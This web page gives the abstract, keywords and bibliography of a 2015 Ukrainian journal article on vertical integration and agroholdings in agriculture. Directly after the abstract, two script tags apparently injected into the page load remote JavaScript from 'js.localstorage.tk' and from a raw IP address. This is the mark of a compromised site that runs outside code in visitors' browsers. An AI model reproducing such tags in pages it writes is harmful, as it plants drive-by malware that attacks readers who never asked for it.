ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 334.012.82:330.837
Інституціональні проблеми розвитку аграрної сфери

Інституційно-господарські форми інтеграції економічних суб'єктів: теоретико-функціональний зміст / Печерський В.В. // Економіка АПК. - 2015. - № 12 - С. 95

Мета статті - визначити та дослідити теоретико-функціональний зміст інституційно-господарської форми інтеграції економічних суб’єктів, що полягає в обґрунтуванні інституційно-економічних умов, організаційних моделей і механізмів розвитку аграрного сектору економіки. Теоретична основа дослідження включає методи аналізу і синтезу, абстрактно-логічний метод, базові положення економічної теорії, що стосуються питань інтеграції як складової розвитку та функціонування як суб’єктів аграрного сектору, так і аграрного сектору в цілому. Тенденція до укрупнення виробництв, а також інтеграційні процеси, що відбуваються не тільки у вітчизняній, але й у глобальній економіці, приводять до утворення підприємницьких об'єднань, найпоширенішою формою яких в Україні є агрохолдинги. На користь утворення агрохолдингових компаній говорить те, що вони можуть зіграти на ефекті від масштабу на світових ринках капіталу та експорту. У статті визначено актуальність розвитку вертикально інтегрованих структур, розглянуто функціональні особливості вертикально-інтегрованого об'єднання. За результатами дослідження визначено інтеграцію ринкових економічних суб'єктів як елемент ринкової взаємодії, на основі безперервного механізму узгодження інтересів у складі інтегрованої структури, в цілях розширення й гармонізації виробничих і збутових ланцюгів, а вертикальна інтеграція розглядається нами як інституційно-економічний процес залучення в єдину інтеграційно-організаційно-економічну структуру, підприємств, які забезпечують або будуть забезпечувати єдиний виробничо-збутовий ланцюг із визначеними функціями контролю над ними одного підприємства чи управляючої компанії. Встановлено, що функціонування інтеграційного механізму забезпечує розвиток інтеграційних процесів в аграрному секторі економіки, що сприяє його ефективнішому функціонуванню. Важливою складовою новизни є ідентифікація специфічних теоретико-функціональних характеристик та особливостей, які відображають ефективність інтеграційних процесів в аграрному секторі економіки. Табл.: 2. Рис.: 7. Бібліогр.: 37.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інтеграція, форми інтеграції, економічні суб’єкти, вертикально-інтегрована структура, вертикальна інтеграція, кластер, кооперація

Список використаних джерел

 1. Андрійчук В.Г. Економіка аграрних підприємств: підруч. / В.Г. Андрійчук. - К.: ІЗМН, 1996. - С.402.
 2. Баклаженко Г.А. Агропромышленные холдинги - основа хозяйственной иерархии экономики переходного периода / Г.А. Баклаженко // АПК: экономика, управление. - 2000. - № 11.
 3. Баркер Г. Как успешно объединить компании/ Ганс Баккер, Джерен Хелминк; пер. с англ. Т.И. Митасова, науч.ред. Г.А. Ясницкий, А.Г. Ясницкая. - Минск: Гревцов Паблишеп, 2008. - 288 с.
 4. Гатаулин А.М. Экономическая теория. Микро- и макроэкономика: учеб. пособие / А.М. Гатаулин, Ю. Р. Стратонович, Р.С. Гайсин. - М. : Изд-во «Финансы и статистика», 2007. - 432 с.
 5. Гудзь Е.Е. Рыночная интеграция в аграрной сфере Украины: тенденции, возможности, угрозы / Е. Е. Гудзь // Никоновские чтения. - 2010. - № 15. - С. 400-402.
 6. Зіновчук В.В. Організаційні основи сільськогосподарського кооперативу / В. В. Зіновчук. - 2-ге вид., доп. і перероб. - К.: Логос,2001. - 380 с.
 7. Малік М.Й. Міжгалузева інтеграція як чинник підвищення ефективності реформованих сільськогосподарських підприємств / М.Й.Малік, М.К. Орлатий. - К.: ННЦ ІАЕ, 2000. - С. 40.
 8. Молдован О.О. Вертикальна інтеграція як напрям підвищення конкурентоспроможності підприємств чорної металургії України / О.О. Молдован // Стратегічні пріоритети. - 2009. - № 2 (11). - С. 145-151.
 9. Нестерчук Ю.О. Вертикальна інтеграція у системі стратегічних цілей аграрної політики держави / Ю. О. Нестерчук // Актуальні проблеми економіки АПК: кол. моногр. / за ред. Д. Семенди, О. Здоровцова. - Умань: Видавець “Сочінський”, 2009. - С. 75-135.
 10. Поздняков К.Ю. Базовые теоретические основы формирования интеграционных процессов / К.Ю. Поздняков // Современные научные исследования и инновации. - 2014. - № 4. - Режим доступу: snauka.ru/issues/2014/04/32976
 11. Політична економія: [підруч.] / В.Г. Федоренко, О.М. Діденко, М.М. Руженський [та ін.]; за наук. ред. д.е.н. проф. В.Г. Федоренка. - К.: Алерта, 2008. - 488 с.
 12. Попов А.А. Интеграция хозяйствующих субъектов в рыночной экономике : автореф. дис. канд. экон. наук : 08.00.01 - Воронеж, 2005.
 13. Райзенберг Б.А. Словарь современных экономических терминов / Б.А. Райзенберг, Л.Ш. Лозовский. - 4-е изд. - М.: Айрис-пресс, 2008. - 480 с.
 14. Родионова О.А. Трансформация интеграционных процессов в агропродовольственной сфере России / О.А. Родионова // Экономика сельскохозяйственных и перерабатывающих предприятий. - 2011. - № 9. - С. 37-40.
 15. Саблук П.Т. Кластеризація як механізм підвищення конкурентоспроможності та соціальної спрямованості аграрної економіки /П.Т Саблук, М.Ф. Кропивко // Економіка АПК. - 2010. - № 1. - С. 3-12.
 16. Саблук П.Т. Стратегічні напрями аграрних реформ - перехід на інноваційну модель розвитку / П.Т. Саблук // Економіка АПК. - 2002. - № 12. - С. 12.
 17. Томілін О.О. Обслуговуюча кооперація - один із проявів вертикальної інтеграції при міжгалузевій взаємодії / О.О. Томілін // Інноваційна економіка. -2012. - № 36. - С. 39-43.
 18. Уильямсон О.И. Вертикальная интеграция производства: соображения по поводу неудач рынка / О. И. Уильямсон ; пер. с англ. // Теория фирмы ; под ред. В. М. Гальперина. - СПб. : Экономическая школа, 1995. - 534 с.
 19. Ушачев И.Г. Организационно-экономический механизм развития агрохолдингов / И.Г. Ушачев, В.П. Арашуков // АПК: экономика и управление. - 2007. - № 5. - С. 9-14.
 20. Федулова Л.І. Інтеграційні процеси корпоративних структур в економіці України / Л.І. Федулова // Економіка та прогнозування. - 2007. - № 3. - С. 19-28.
 21. Шукалович В.Ф. До питання формування вертикальної інтеграції в агробізнесі / В. Ф. Шукалович, В. М. Трокоз // Вісн. Держ. агроекологічного у-ту. - 2011. - № 2 - С. 212- 220.
 22. Шукалович В.Ф. Вертикальна інтеграція, координація та контроль в агробізнесі / В.Ф. Шукалович // Сталий розвиток економіки. - 2012. - № 6. - С. 194-203.
 23. Шпикуляк О.Г. Інститути й інституції у розвитку інтеграційних процесів в аграрній сфері / О.Г. Шпикуляк, О.Ю. Лузан // Економіка АПК. - 2013. - № 4. - С. 86.
 24. Офіційний сайт «Кернел Груп» [Електроний ресурс]. - Режим доступу: http://wwwus.kernel.ua/rus/about/about.html.
 25. Офіційний сайт ВАТ «Миронівський хлібопродукт» [Електронний ресурс]. - Режим доступу: http://www.mhp.com.ua10.
 26. Офіційний сайт Кондитерська корпорація «Roshen» [Електронний Ресурс]. - Режим доступу: http://www.roshen.ua12.
 27. Офіційний сайт «Холдинг «ТіС» [Електронний ресурс]. - Режим доступу: http://www.holding-tic.com.ua/ukr/about.htm/.
 28. Acemoglu D., Aghion P., Griffith R., Zilibott F., 2010. Vertical integration and technology: theory and evidence. J. Eur. Econ. Assoc. 8 (5), 989 - 1033.
 29. Acemoglu D., Johnson S., Mitton T., 2009. Determinants of vertical integration: financial development and contracting costs. J. Financ. 64 (3), 1251 - 1290.
 30. Hesham S. Vertically integrated management structures of oil companies. University Newsletter (The State University of Management), 2012,vol. 1, no. 8. p. 5-9.
 31. Baldwin R. and Wyplosz Ch. The Economics of European Integration. - McGrawHill Education, London, 2004. - 458 p.
 32. Atalay E., Hortacsu A.and Syverson Ch. (2014),“Vertical Integration and Input Flows,” American Economic Review , 104, 1120-1148.
 33. Fan J.P.H., Wong T., Zhang T., 2013. Institutions and organizational structure: the case of state-owned corporate pyramids. J. Law Econ. Org. 29 (6), 1217- 1252.
 34. Isayeva I.V. Formation of innovative development strategy of a vertically integrated company under informatization. Business. Education. Right. Volgograd Institute of Business Newsletter, 2011, no. 4 (17).
 35. Knobel A.Yu. Vertical integration, technological connectivity of production facilities, opportunistic behavior and economic growth / Preprint # BSP / 2008/097. M.: Economic School, 2008.
 36. Mizanbekova S.K., 2011. Increase of effectiveness of intersectoral cooperation in the AIC system of Kazakhstan. Herald IKTU A.Yassaui. 2 (74): 101 - 105.
 37. Loertscher S. and Reisinger M. (2014), “Market Structure and the Competitive Effects of Vertical Integration,” Rand Journal of Economics , 45(3), 471-494.
Читати статтю: 16.pdf